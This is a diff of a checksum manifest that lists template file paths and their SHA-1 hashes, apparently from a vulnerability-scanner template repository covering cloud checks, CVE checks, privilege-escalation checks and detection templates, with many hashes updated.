-cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:c06c27e68774a784761d0cbd3689fdd89863d7a3 -cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:3bcfa775b1e509ace4f07894c5e64dec2a8102d0 -cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:efbd1fb8316fb0c722ef3594acf3ab73ab507001 -cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:7b4ef3cfeb343431d1f9b190e120eaaa91bebc7f -cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:906ba0ad97de252e06c50c38730aaebdac7bc023 -cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:b4df47fb9e6d61ed3b23cece6fdc520af4e27272 -cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:6a5e502d62e12375a44372597e413fff2bf4eb8f -cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:8312fc3a5afcd9be518ec3c1307e33c5fbdc8876 -cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:77ada67363c284bd1d4f88f954d5e32c0215fced -cloud/aws/cloudwatch/cw-alarm-action-set.yaml:8e93205afe124c575c452e08c3f495a0bc0d6322 -cloud/aws/cloudwatch/cw-alarms-actions.yaml:1bd05f73d6b1397f8301ef4470953e937b85349c -cloud/aws/ec2/ec2-imdsv2.yaml:b7ae7a7a6058c3610711eda97012b2fcd730b66c -cloud/aws/ec2/ec2-public-ip.yaml:51f2fc2d002b379bbac747eef58ab0f0ebbc7c3b -cloud/aws/ec2/ec2-sg-egress-open.yaml:be43d24ee1e4725de739360bd2e5f8612bb2ab20 -cloud/aws/ec2/ec2-sg-ingress.yaml:7964a909402f282b12879eddfe63a102937603d9 +cloud/aws/acm/acm-cert-renewal-30days.yaml:ad88137bc1382a729e7b3f3a0172aab684af2743 +cloud/aws/acm/acm-cert-renewal-45days.yaml:0cb9388dd736046c47748a973e9092c12ada2f79 +cloud/aws/acm/acm-cert-validation.yaml:80abfd317bfc8f3b1135306fe1d088ae1f221b72 +cloud/aws/acm/acm-wildcard-cert.yaml:548aae1e827932d43b49fb3d56a08adb940380a5 +cloud/aws/aws-code-env.yaml:665ae1a8ac32081e7ed075778cacbee8e682f166 +cloud/aws/cloudtrail/cloudtrail-data-events.yaml:4c389a00e057e38643fcdae14f4227c0f885c33a +cloud/aws/cloudtrail/cloudtrail-disabled.yaml:cbe94d6f388368b438f1f43df2ee3d51e1389f29 +cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:c7b753e82b1328fdd2b6718f5e7c7297974c882f +cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:79a14ccd16ffa923a577a003733336c092fdd13f +cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:791828a3019b05a4c14c4f60809012671d53b3f7 +cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:9419b076bea5793e418525eaa7c8ce07d42e0f4f +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:fb34a4989e724b4a4cfd25b15d25627ebc887871 +cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:09b70c57a35521518c0ed7d3a0fd8dc58617ca30 +cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:88e6c51f355b94ced869e714c9b56bb4488d4a83 +cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:233aca72ce14eb8b6523a8ef09785d5dfe4c2f27 +cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:3a67a177c3537b361b26b549a622c0a4647deee3 +cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:660261dce36382f203ec7e16e01d2e29f9bf7836 +cloud/aws/cloudwatch/cw-alarm-action-set.yaml:b02b7e970b71be76717b5fc7e132b23adb5048e0 +cloud/aws/cloudwatch/cw-alarms-actions.yaml:f0198d619bebd6afa41568d0c8c9bac456261021 +cloud/aws/ec2/ec2-imdsv2.yaml:bb7909c4b9b433dd90c343b3a03122f9c5c310a0 +cloud/aws/ec2/ec2-public-ip.yaml:5fb5ee7dd9d51781a4a2903a0cb05b21fa586f85 +cloud/aws/ec2/ec2-sg-egress-open.yaml:047f551aa108926349f69ba8d47189d88b7aab01 +cloud/aws/ec2/ec2-sg-ingress.yaml:a3ae5dd6493e18cb563cc617ec5deba14ff5ecb4 cloud/aws/ec2/ec2-unrestricted-cifs.yaml:7eabd6e954f8d0070f2b5f51fd484a61ccd5aced cloud/aws/ec2/ec2-unrestricted-dns.yaml:28b9a572c9620e84a77538311fe8d5e285b60fff cloud/aws/ec2/ec2-unrestricted-ftp.yaml:c2bca6e54611f703c31298bb5ad5f21a8f21cb8a @@ -50,69 +50,69 @@ cloud/aws/ec2/ec2-unrestricted-redis.yaml:900da1c9b31742203eda75afd776c3741bf4d3 cloud/aws/ec2/ec2-unrestricted-smtp.yaml:e0e56306e511d708334ff997489e4351104028a9 cloud/aws/ec2/ec2-unrestricted-ssh.yaml:92a1200da475f085c33d0f86edd3077ba19eea33 cloud/aws/ec2/ec2-unrestricted-telnet.yaml:d7f80cec0723d2723300c078552824ec1a8b641a -cloud/aws/ec2/publicly-shared-ami.yaml:1b230fa757bc87a3872f3cf28caea7febf2ff4f6 -cloud/aws/ec2/unencrypted-aws-ami.yaml:76a00cb25301c234cb8900b74ad5cdc88f8a92fb +cloud/aws/ec2/publicly-shared-ami.yaml:49e3f4939b9991f5ac9db99fbb7f7caba021227d +cloud/aws/ec2/unencrypted-aws-ami.yaml:35fc4a61e70120df3aafba92b4153ffa5b8c92b6 cloud/aws/iam/iam-access-analyzer.yaml:f50b212fc028372e3aeba52e43c0417c845a01a9 cloud/aws/iam/iam-expired-ssl.yaml:a2ec4618352430440ddb4d7704058a4c7507d3f8 -cloud/aws/iam/iam-full-admin-privileges.yaml:b688df4035b376d214403db5be25bde4c2f70381 -cloud/aws/iam/iam-key-rotation-90days.yaml:c6a3a5ebb54f4220734c0b3ef47b2a5972c57f33 -cloud/aws/iam/iam-mfa-enable.yaml:881d50b89365d4f976e8896ab448f21cf8492372 +cloud/aws/iam/iam-full-admin-privileges.yaml:ab5d0948a725aa5a9a1059d6b7c0ae9f5d846d06 +cloud/aws/iam/iam-key-rotation-90days.yaml:43618c5c22bb0c4152ed7895a9e5267ed075700f +cloud/aws/iam/iam-mfa-enable.yaml:e69f27aac73a18caece8e35bb884051cd21d34d9 cloud/aws/iam/iam-password-policy.yaml:0c0198bd8d1a51bb19a33eaca3eb0e0084ddb229 cloud/aws/iam/iam-root-mfa.yaml:5b82c6ccd615779185fd186e0a7c0455c02340fc -cloud/aws/iam/iam-ssh-keys-rotation.yaml:f9f071c240df8cc1a536af96addb949a629fa427 +cloud/aws/iam/iam-ssh-keys-rotation.yaml:d3bb01e0e9eba3375cee6bf5bbde2c2b629b5cd3 cloud/aws/iam/iam-unapproved-policy.yaml:883cdcaea84c6970f6f99cc3289ffc2ed85bbac1 cloud/aws/iam/iam-user-password-change.yaml:99ffdaecc6bb1aa4200a5853b703163276a1b2af cloud/aws/iam/ssl-cert-renewal.yaml:40622e59896e04627695c6d286e0015aaed13010 -cloud/aws/rds/aurora-copy-tags-snap.yaml:34e67858bdd4c7dc64f6e4ab81ba16cf566e8591 -cloud/aws/rds/aurora-delete-protect.yaml:2fe057fba18afe1489d452c15a45813c3c4a01b2 -cloud/aws/rds/iam-db-auth.yaml:abca14ba56ec135b925a960be79155e318cc6315 -cloud/aws/rds/rds-backup-enable.yaml:e0aff94d2aef3573de529a563e157a0e7979b54e -cloud/aws/rds/rds-deletion-protection.yaml:96a5ed61c07064568e10f1b0b323a642bcf1dcbc -cloud/aws/rds/rds-encryption-check.yaml:09f859cd5a745c4188e35c94fe84818aa4ffdea7 +cloud/aws/rds/aurora-copy-tags-snap.yaml:9d0f7c95a0e76e441aa771fc7ee6c85a0f510736 +cloud/aws/rds/aurora-delete-protect.yaml:4ff1aef5f611e5bdec4248c135e99db23c8c599e +cloud/aws/rds/iam-db-auth.yaml:8b12e2e629800d449708351652b27657e5854081 +cloud/aws/rds/rds-backup-enable.yaml:cf8045353bdd93d67f9daf86df24ad7d94004cab +cloud/aws/rds/rds-deletion-protection.yaml:7b330b03c3a6066324dfe33af351de0b85cb4cd0 +cloud/aws/rds/rds-encryption-check.yaml:c35b52675cf1ae565d3edd5a8864e1601a1fb498 cloud/aws/rds/rds-event-notify.yaml:03998790659d38696b70b1f3e6c64c6dffccc7a2 cloud/aws/rds/rds-event-sub-enable.yaml:10469f43441c8414c199458f88524419275a187b cloud/aws/rds/rds-event-sub.yaml:f83dba6f60062de8a3accc50ed6ef2e83aca9e67 -cloud/aws/rds/rds-gp-ssd-usage.yaml:9dc075230c55ead686818722050380f6404e6a14 -cloud/aws/rds/rds-public-snapshot.yaml:307a8023623a3135d5e8adb105660f52426da48c -cloud/aws/rds/rds-public-subnet.yaml:39a47b39e010cd3b0854d7008adaf224ebafea92 -cloud/aws/rds/rds-ri-payment-fail.yaml:6181710de88b12b439682c924b4b5267f8f122e8 -cloud/aws/rds/rds-snapshot-encryption.yaml:4126d049126c4c982252c06475b0744ca3c4c0e2 -cloud/aws/s3/s3-access-logging.yaml:f391ad75eb3174ceeeeb6e496a5ab45d08e65f51 -cloud/aws/s3/s3-auth-fullcontrol.yaml:7832f30b25cf7f8217b3e734c4d86b7b21626a46 -cloud/aws/s3/s3-bucket-key.yaml:f4268bce463fd696b07d82f14877c02defde0e1f -cloud/aws/s3/s3-bucket-policy-public-access.yaml:7b509947c50ce3b4bf6a826c8f8c5631a0b30a2b -cloud/aws/s3/s3-mfa-delete-check.yaml:b3778d31e6ad283506389e031d501e5548bda42c -cloud/aws/s3/s3-public-read-acp.yaml:4c0b07cde46c6d3e11cdb3ff34bb6d3f491df69b -cloud/aws/s3/s3-public-read.yaml:d0a029d1df6d987bfbda997bf1370b41e26e640e -cloud/aws/s3/s3-public-write-acp.yaml:ee80977bb47d13a81cb7d7f1b2fc36ca396b0e3e -cloud/aws/s3/s3-public-write.yaml:37a3ce73d1d947d355245806f6c6a8dedf569691 -cloud/aws/s3/s3-server-side-encryption.yaml:81c5384c6fbf9ab0dd475a26ee4eda0507c40edc -cloud/aws/s3/s3-versioning.yaml:7a28352d7f81784bb2f08e08376023fde47e234b -cloud/aws/sns/sns-topic-public-accessible.yaml:9821c4c1ed5b22b0b57184f34fa4619932c9f405 -cloud/aws/vpc/nacl-open-inbound.yaml:5e1ef2d22f533b048c8f22662bf0f6f341a0a32d -cloud/aws/vpc/nacl-outbound-restrict.yaml:d00bcba3fa5e0c8efa02bcfcd0dfac25a3d09564 -cloud/aws/vpc/nat-gateway-usage.yaml:c9da419a181294a5d2b70734b82a2f6592b95099 -cloud/aws/vpc/unrestricted-admin-ports.yaml:0be6a01f11196a2c8da29f70d6f29abeab7bfda1 -cloud/aws/vpc/vpc-endpoint-exposed.yaml:671dd1bf89e2ea988aeaae08da632805c8eb75c5 -cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:0f4d4bbcdf6e0da8e942ec2f91a1219b22d0e09b -cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:fc8346995c4cdbdb57ef8d592529e470416ad3f2 -cloud/aws/vpc/vpn-tunnel-down.yaml:2f8fe16da2e6465527a674b60b3d81f1055b4d30 +cloud/aws/rds/rds-gp-ssd-usage.yaml:bf522b4246d3285ca43b326e0565b532ad7315ac +cloud/aws/rds/rds-public-snapshot.yaml:c5d64997130a6c496154d96b3373904bd1fbebfd +cloud/aws/rds/rds-public-subnet.yaml:d2b63d178d24faa83223568a3bb5bb7ac2a53f46 +cloud/aws/rds/rds-ri-payment-fail.yaml:905953edc8139ecfb370d3ee288b65e77eef65b0 +cloud/aws/rds/rds-snapshot-encryption.yaml:fb8b45fa0dff44a66911abf6a70e32530de776f1 +cloud/aws/s3/s3-access-logging.yaml:60f0011f6da935cef7d76840d5755de49e06730e +cloud/aws/s3/s3-auth-fullcontrol.yaml:b7bbb1b9edac9baef27465651bb5afcf41ff51e3 +cloud/aws/s3/s3-bucket-key.yaml:0fe1d8b9f1b99dc0231d0c22ea3a68b2fdf2a7b6 +cloud/aws/s3/s3-bucket-policy-public-access.yaml:0ee112198ff02870b91e7a4af42de448a2cd022d +cloud/aws/s3/s3-mfa-delete-check.yaml:520ae75fc517dda07b6f24db775b2a25d435c268 +cloud/aws/s3/s3-public-read-acp.yaml:f30e8e04fe7f4a123778115fa3ec9d7f858786cb +cloud/aws/s3/s3-public-read.yaml:3bc4bb5f002b22ed9bbd15067b95f89184eb9258 +cloud/aws/s3/s3-public-write-acp.yaml:3cb356eb0d36ac3d681edec2d7c7635adadb485e +cloud/aws/s3/s3-public-write.yaml:4f322fd5432d6efb07e0e01f174c9c59f24bde7c +cloud/aws/s3/s3-server-side-encryption.yaml:6148a203262dc65bf4f7de822e65f255e6c56f79 +cloud/aws/s3/s3-versioning.yaml:c3c6bd9bb375fc3f91a9566f63d8e443388e2f40 +cloud/aws/sns/sns-topic-public-accessible.yaml:b9837c9dc66bf792cb12a535c0490ba483e29663 +cloud/aws/vpc/nacl-open-inbound.yaml:364184b88817ca98ecccc4661c798e3f9929df49 +cloud/aws/vpc/nacl-outbound-restrict.yaml:5c11a1c330cab97bd0f2cf1fcbe38db5a242f980 +cloud/aws/vpc/nat-gateway-usage.yaml:4f8877ca0d721da30e72e5364afa29adb304a84d +cloud/aws/vpc/unrestricted-admin-ports.yaml:1a7fe922017306201eff8cd2f4b74d429db74d67 +cloud/aws/vpc/vpc-endpoint-exposed.yaml:c24180f47180c6b0672101c7bb9336a70457d9ea +cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:f377a04df391b4805fa907715678ae07560a0eba +cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:58d5b6db8dfc1a6a83d90e02a2513dd7596d0834 +cloud/aws/vpc/vpn-tunnel-down.yaml:3dad3117b4dacf45609dd13e9c3a84777ec8e591 cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f -cloud/enum/azure-db-enum.yaml:29f1ad33a47d39bc552d02533839a80b79619900 -cloud/enum/azure-vm-cloud-enum.yaml:18c6da26918310034f8eb035697eae577a724805 +cloud/enum/azure-db-enum.yaml:b1ec799e3d7c4b895f7b7a8c14c29c44621d91f1 +cloud/enum/azure-vm-cloud-enum.yaml:4d4d888b6864d60e4aa01e8c6d5c63e4e0e7afba cloud/enum/azure-website-enum.yaml:02e3fbd067ec765f0d87e069624d68b802323137 cloud/enum/gcp-app-engine-enum.yaml:735d4025743533df111b8bee9132eb2503019b92 cloud/enum/gcp-bucket-enum.yaml:954d5a61d8cceec64101392998396f4c48cb94c4 cloud/enum/gcp-firebase-app-enum.yaml:3fd3b413096838d123d31f2a7e3ccb02bc74dd73 cloud/enum/gcp-firebase-rtdb-enum.yaml:4bd510aa205a80e5b9db5572b16b90949d898842 -code/cves/2019/CVE-2019-14287.yaml:c57f9bad2346d2a553366398a3a4dfb9370ddcb2 -code/cves/2021/CVE-2021-3156.yaml:a2f36d0bf44a323b821c30437399ae6ad5852abd -code/cves/2023/CVE-2023-2640.yaml:be9ff617ba5271e2646624e60a5215c664a56f03 -code/cves/2023/CVE-2023-49105.yaml:2308814e81e867c32a5a50d5c9acb28919bea42f -code/cves/2023/CVE-2023-4911.yaml:2f8782ca74a7191a0a2650a2b448f517a0441278 -code/cves/2023/CVE-2023-6246.yaml:91a2678a4f75c6c3fbf349e8dc2422ace1a9ff96 -code/cves/2024/CVE-2024-3094.yaml:68e36febeac5084900eba78657e56587fc86bd6e +code/cves/2019/CVE-2019-14287.yaml:4bac98e672bcc82f1fdb764079e0c1b087e59b12 +code/cves/2021/CVE-2021-3156.yaml:4df2c2fa45f3503655f6ed1b743668b82afda3f5 +code/cves/2023/CVE-2023-2640.yaml:08c6ebd7086926c0712bc1ecc78353604883a385 +code/cves/2023/CVE-2023-49105.yaml:e0a0b7efc275eb11418c5e83d68fe1fdf2ab4fb1 +code/cves/2023/CVE-2023-4911.yaml:42a625449ef87ff1c259f6dedeca315142e5269a +code/cves/2023/CVE-2023-6246.yaml:8058db855cf5f4eacb8c8c731b1febe24f11c6e1 +code/cves/2024/CVE-2024-3094.yaml:5982cc7d1de61a63e86645d8735de6236c9a074d code/privilege-escalation/linux/binary/privesc-aa-exec.yaml:03e874f0a174244627cc2c167c3d9829bf12f260 code/privilege-escalation/linux/binary/privesc-ash.yaml:a19a050317a19374ca4edc12474fd1de3600999b code/privilege-escalation/linux/binary/privesc-awk.yaml:0fb5884b81ce822978b5c9fbbd5d266333e002be @@ -163,7 +163,7 @@ code/privilege-escalation/linux/binary/privesc-sash.yaml:47db9ab06a4f468b98d6503 code/privilege-escalation/linux/binary/privesc-slsh.yaml:431c5dc758a7683b9da0da0e6beb24d934c70f9e code/privilege-escalation/linux/binary/privesc-socat.yaml:037b6e4915a0c15a9fadd209acd67e814a0860fd code/privilege-escalation/linux/binary/privesc-softlimit.yaml:657b4d5a9ffaa499869ef3b78bed2d150b67ea48 -code/privilege-escalation/linux/binary/privesc-sqlite3.yaml:48b1edb4197cf2f0b28e00b6962a628135673280 +code/privilege-escalation/linux/binary/privesc-sqlite3.yaml:3cef3a8aa4ade6cd6547b1de157a7949e17f568a code/privilege-escalation/linux/binary/privesc-ssh-agent.yaml:f0ebce1afdb3fd1eae222f9c7b6ea5a601af3ed0 code/privilege-escalation/linux/binary/privesc-sshpass.yaml:13b17781d68a728c2a05ba9c8d6bca1a72e93105 code/privilege-escalation/linux/binary/privesc-stdbuf.yaml:8102de9b345ef557aefd83e193797a65cdfb8258 @@ -190,29 +190,29 @@ code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 cves.json:7e57aa58a2dde22d0e60ebdfb0a10c00a2310cec cves.json-checksum.txt:8866cb507164321fe99b89f58ef28da52a9cb13b -dast/cves/2018/CVE-2018-19518.yaml:0d6eeac112afec77c0cd66694ee3209fbeb3b460 -dast/cves/2021/CVE-2021-45046.yaml:9098bcd20d5b9132e13f2e634d26a39571731932 +dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 +dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e -dast/cves/2022/CVE-2022-42889.yaml:79536a14253675b31233e5b7d4e79ec6a7bce887 -dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml:a6cf83100df3e0ef6c1b65fdd383367e255db29b -dast/vulnerabilities/cmdi/ruby-open-rce.yaml:adfb5324a22b3ea5963127e56fb3fa92e7c12de7 -dast/vulnerabilities/crlf/cookie-injection.yaml:35c0cec9d407aae529b3f96b3f143db6c5cd8223 -dast/vulnerabilities/crlf/crlf-injection.yaml:612d455cb555c0d9bc01d5f0477d1f0fe7816e65 +dast/cves/2022/CVE-2022-42889.yaml:bbcd3a85fcaf36a7198fde75caf5c415aa54df50 +dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml:cb0a13c0462df4852b6e80e43d710ae520cdd4d6 +dast/vulnerabilities/cmdi/ruby-open-rce.yaml:89c6935b600f5037198944b00841ae4e650ee39b +dast/vulnerabilities/crlf/cookie-injection.yaml:47b5859ec897917dcc633dee9d83454b203d2ab8 +dast/vulnerabilities/crlf/crlf-injection.yaml:b2a16bd3436b9429d72d4f929ab55ad5ee880a91 dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28f4ec95a4d09add80ffff07e7a8f71d -dast/vulnerabilities/lfi/lfi-keyed.yaml:15d9689d387442b530a740277764c5288d5bcf66 -dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:d05ef53604c1b09350051bf8927fb17d588b17d4 -dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:2681af5d5766eac8d9d94f71f6478936b6acac2d -dast/vulnerabilities/redirect/open-redirect.yaml:03d1e0ecfb57643c556ae97b9da6205e7cdf6075 -dast/vulnerabilities/rfi/generic-rfi.yaml:ccb7f6213b85d318ddccdc0ed035640cb0eca155 -dast/vulnerabilities/sqli/sqli-error-based.yaml:21fbab3668dc242a83af4b5654b67812fbee10c6 -dast/vulnerabilities/ssrf/blind-ssrf.yaml:b9fb10ee3cac909923cd69e66bcd00cc4711c766 -dast/vulnerabilities/ssrf/response-ssrf.yaml:87ed924c7dd70a88445f55a5e43e80103b9fa7ba -dast/vulnerabilities/ssti/reflection-ssti.yaml:bc1e6afaa6c2b1391163446b093245fe52475c52 +dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c +dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 +dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d30c25c13 +dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471 +dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 +dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f +dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26 +dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 +dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 -dast/vulnerabilities/xss/reflected-xss.yaml:d837fd6ed987c2af01f3c91f36c8aa46e3ce2e2b -dast/vulnerabilities/xxe/generic-xxe.yaml:18be2e50e0f2b956e69ce2ceacc4c7fd41547893 +dast/vulnerabilities/xss/reflected-xss.yaml:cbb257b78545acfdb058780827b255ca8ac6099c +dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a -dns/bimi-detect.yaml:be88a91ed368a29c663e8d045770d696941ee923 +dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 @@ -307,7 +307,7 @@ file/keys/confluent/confluent-access-token.yaml:22ef00e0d38ab3ff684399ecbc434ab0 file/keys/confluent/confluent-secret-token.yaml:5bf255f39a1dd565761bdd3faef2d40474b6e8d9 file/keys/contentful-api-token.yaml:be395d34eb41b023482cb411bbf552776687b238 file/keys/cratesio-api-key.yaml:78dd41536f3722d2334681d08d0e2332c317875a -file/keys/credential-exposure-file.yaml:7ca12c30144aba001cf357141b4fd0e9e89dc1d5 +file/keys/credential-exposure-file.yaml:744eb01f428dc3d3bbaa36c97ef74b297cc44d36 file/keys/credentials.yaml:7d9557524fa206e8bb91295da81890e44084838f file/keys/databricks-api-token.yaml:a9bfc986be3fff96341f96b4213700a370c852a4 file/keys/datadog-access-token.yaml:12b74598ee375f3a5ffbcd81ef8d526c9b852638 @@ -570,7 +570,7 @@ file/webshell/asp-webshell.yaml:3d5fd63aebe784dc4f49b04478b7fef5f4e9e2c2 file/webshell/jsp-webshell.yaml:2d750d74431e61570c7d96d5ffeb4353d3820a1d file/webshell/php-webshell.yaml:8465f2abe6a2b13a2f3ceaa3c277a7fdebdfaa41 file/xss/dom-invader-xss.yaml:9b911e2d4de98274f413c9a6a6689a4609c66eaa -headless/cves/2018/CVE-2018-25031.yaml:0575e57be2ecb42413b4a1f94c936b7a8130ee8c +headless/cves/2018/CVE-2018-25031.yaml:d1b98330ac63ebee28a14fc633dafbf039ed6c48 headless/dvwa-headless-automatic-login.yaml:4c1f2437b541a83dfda0e1239995b08a0315e478 headless/extract-urls.yaml:499408f8b8d77cb5315ed584ac23c90328823a3f headless/headless-open-redirect.yaml:b18cf92bc09eff3df48ca7c7e4f0c6d4fef9b97c @@ -580,7 +580,7 @@ headless/prototype-pollution-check.yaml:e7e9713474a3f7376073cb23ae5f878973238f65 headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 -headless/webpack-sourcemap.yaml:b87241133bd43542be006044425c0e54fd90ce42 +headless/webpack-sourcemap.yaml:de0976ebc4c4be771e050da56a5d08212e054a09 headless/window-name-domxss.yaml:d56b00173f38f50a27940e5beeaa9499d6cd7c2c helpers/payloads/CVE-2018-25031.js:47b0062436e7afe62fc2f8251a29bb4d443327d2 helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa @@ -843,10 +843,10 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 -http/cnvd/2017/CNVD-2017-06001.yaml:ba89239706a52d6fb90ef5d2839a27998b094a67 +http/cnvd/2017/CNVD-2017-06001.yaml:5ce62ea8bef46ad255ccbd17bad1a3fa2ea4e651 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 -http/cnvd/2019/CNVD-2019-06255.yaml:b5ac6795873114fa8e9a054e020d6d050127c153 +http/cnvd/2019/CNVD-2019-06255.yaml:6b4def981648c129b9f13689a45185a2979848c8 http/cnvd/2019/CNVD-2019-19299.yaml:cd50ea5ec3feef05ce24f3cc0156675d3c9c975e http/cnvd/2019/CNVD-2019-32204.yaml:cebac2aca6a77c5ec79483cbdc162c22c158bd7e http/cnvd/2020/CNVD-2020-23735.yaml:ad6eb9158cab78f80ed0a048f4e63b56890d46fd @@ -897,67 +897,67 @@ http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:24e33df http/credential-stuffing/self-hosted/grafana-login-check.yaml:0b82037ff4e9c72df81aa93d7c7f5c745866c664 http/credential-stuffing/self-hosted/jira-login-check.yaml:968e46885f51c77a83c0698e59e96c37b37ea8b8 http/cves/2000/CVE-2000-0114.yaml:ebdf6c20a94e575096700e3a5a2bcb88c9995708 -http/cves/2001/CVE-2001-0537.yaml:d382d674c6a41452f9875ae325f7a4bc521a3436 -http/cves/2002/CVE-2002-1131.yaml:93453aab0c68ec326bdcfb1a1386df77e0bf71a1 +http/cves/2001/CVE-2001-0537.yaml:de9c0ed411efc68bb0f84a002805c674f14077dc +http/cves/2002/CVE-2002-1131.yaml:adca734956f3016c9f8035e5ad9d3d5e7facd4f4 http/cves/2004/CVE-2004-0519.yaml:7968af9d55ad3d7db45d4978c04830f4b81a26ed http/cves/2004/CVE-2004-1965.yaml:1f20050eb605b78c6c0307155707e90d3c3a5cd5 -http/cves/2005/CVE-2005-2428.yaml:e09462c8f4b106cff927fefab3ca9724b08ea278 +http/cves/2005/CVE-2005-2428.yaml:cbf013aa0397077f4c33e09aa3f56783421f5954 http/cves/2005/CVE-2005-3344.yaml:54a7b30968e8eff300d74083651ac78ba54a6b61 -http/cves/2005/CVE-2005-3634.yaml:3adbddbf3e0a1a6611d9b5f6979024e5e563953a +http/cves/2005/CVE-2005-3634.yaml:c3fd26c6ac6037bf1de96a1e74bd51d4a7f3d4d2 http/cves/2005/CVE-2005-4385.yaml:20057d0cba302dc1bad5953124947e0267033c89 http/cves/2006/CVE-2006-1681.yaml:3dab8b5c90252f5c915312e7ad02426c2d60f98f -http/cves/2006/CVE-2006-2842.yaml:bacd02ccf706949bd716f4d2cd2f9c0799098c05 +http/cves/2006/CVE-2006-2842.yaml:8a7b90e8a3ee931cf054da360fa1f0402acd6aed http/cves/2007/CVE-2007-0885.yaml:2bc9559f910da5a0f99cf4412fe56ab526bdb039 -http/cves/2007/CVE-2007-3010.yaml:a4e5d49eac9e1a434c99159ba3cb47fc57ba6c58 +http/cves/2007/CVE-2007-3010.yaml:50262ff50d9740bca03dc27b3fedc1f5cc99ce1d http/cves/2007/CVE-2007-4504.yaml:09f70f7c4bd05d9a2f38874308b2b97a0f22547b http/cves/2007/CVE-2007-4556.yaml:74d58c6684bd7085f1b675e0fdb910c9bf5f45c9 -http/cves/2007/CVE-2007-5728.yaml:ee0142ec5433f1ddb20340ca06d7f0dbc939b76b +http/cves/2007/CVE-2007-5728.yaml:96b48fa3515596a3a1a7a0b92aafe66060e4908f http/cves/2008/CVE-2008-1059.yaml:a6e88a29e1382a7a92d2465b513ffd1223d870b9 -http/cves/2008/CVE-2008-1061.yaml:e02a560cde228c062682c76b2a0226125341dd75 -http/cves/2008/CVE-2008-1547.yaml:d695808a224b08d70db7a79cc64479940964a67b +http/cves/2008/CVE-2008-1061.yaml:6a79aa144d26030deb0f8e99d444e126f6467d33 